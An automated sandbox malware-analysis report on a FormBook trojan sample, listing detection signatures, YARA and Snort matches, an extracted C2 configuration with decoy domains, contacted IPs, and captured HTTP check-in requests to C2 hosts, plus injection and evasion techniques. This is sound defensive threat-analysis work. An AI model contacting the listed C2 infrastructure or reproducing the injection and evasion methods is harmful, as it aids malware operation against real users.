Play interactive tour

Edit tour

Windows Analysis Report UaTmOE6yP9

Overview

General Information

Sample Name:	UaTmOE6yP9 (renamed file extension from none to exe)
Analysis ID:	492896
MD5:	4c70d5b1c63a468f7e0aedf64f93ca42
SHA1:	c248ab00560786b7be23151597d9503a2e84602f
SHA256:	83242a0f42be34e66e502e4a3a45d2470f3b24aef8a1d8484711f4439d7fe74a
Tags:	32exeFormbooktrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to delay execution (extensive OutputDebugStringW loop)

Machine Learning detection for sample

Binary or sample is protected by dotNetProtector

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

UaTmOE6yP9.exe (PID: 6468 cmdline: 'C:\Users\user\Desktop\UaTmOE6yP9.exe' MD5: 4C70D5B1C63A468F7E0AEDF64F93CA42)

UaTmOE6yP9.exe (PID: 6624 cmdline: C:\Users\user\Desktop\UaTmOE6yP9.exe MD5: 4C70D5B1C63A468F7E0AEDF64F93CA42)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wscript.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 7124 cmdline: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8f38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x92d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31d58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x320f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59b78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59f12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14fe5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3de05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x65c25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d8f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x65711:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3df07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65d27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1525f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3e07f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x65e9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9cea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x32b0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x5a92a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17409:$sqlite3step: 68 34 1C 7B E1 0x1751c:$sqlite3step: 68 34 1C 7B E1 0x40229:$sqlite3step: 68 34 1C 7B E1 0x4033c:$sqlite3step: 68 34 1C 7B E1 0x68049:$sqlite3step: 68 34 1C 7B E1 0x6815c:$sqlite3step: 68 34 1C 7B E1 0x17438:$sqlite3text: 68 38 2A 90 C5 0x1755d:$sqlite3text: 68 38 2A 90 C5 0x40258:$sqlite3text: 68 38 2A 90 C5 0x4037d:$sqlite3text: 68 38 2A 90 C5 0x68078:$sqlite3text: 68 38 2A 90 C5 0x6819d:$sqlite3text: 68 38 2A 90 C5 0x1744b:$sqlite3blob: 68 53 D8 7F 8C 0x17573:$sqlite3blob: 68 53 D8 7F 8C 0x4026b:$sqlite3blob: 68 53 D8 7F 8C 0x40393:$sqlite3blob: 68 53 D8 7F 8C 0x6808b:$sqlite3blob: 68 53 D8 7F 8C 0x681b3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.UaTmOE6yP9.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.UaTmOE6yP9.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.UaTmOE6yP9.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.UaTmOE6yP9.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: UaTmOE6yP9.exe	Virustotal: Detection: 43%	Perma Link
Source: UaTmOE6yP9.exe	Metadefender: Detection: 37%	Perma Link
Source: UaTmOE6yP9.exe	ReversingLabs: Detection: 77%

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Show sources

Source: UaTmOE6yP9.exe

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: www.simpeltattofor.men/mjyv/

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: UaTmOE6yP9.exe

Joe Sandbox ML: detected

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: UaTmOE6yP9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: UaTmOE6yP9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49812 -> 108.179.246.105:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49817 -> 23.227.38.74:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.179.246.105 80
Source: C:\Windows\explorer.exe	Domain query: www.corlora.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe	Domain query: www.thehauntdepot.com
Source: C:\Windows\explorer.exe	Domain query: www.bellaalubo.com
Source: C:\Windows\explorer.exe	Domain query: www.pastlinks.com
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe	Network Connect: 54.85.93.188 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.jspagnier-graveur.com
Source: C:\Windows\explorer.exe	Domain query: www.behiscalm.com
Source: C:\Windows\explorer.exe	Domain query: www.productprinting.online
Source: C:\Windows\explorer.exe	Domain query: www.miyonbuilding.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.simpeltattofor.men/mjyv/

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
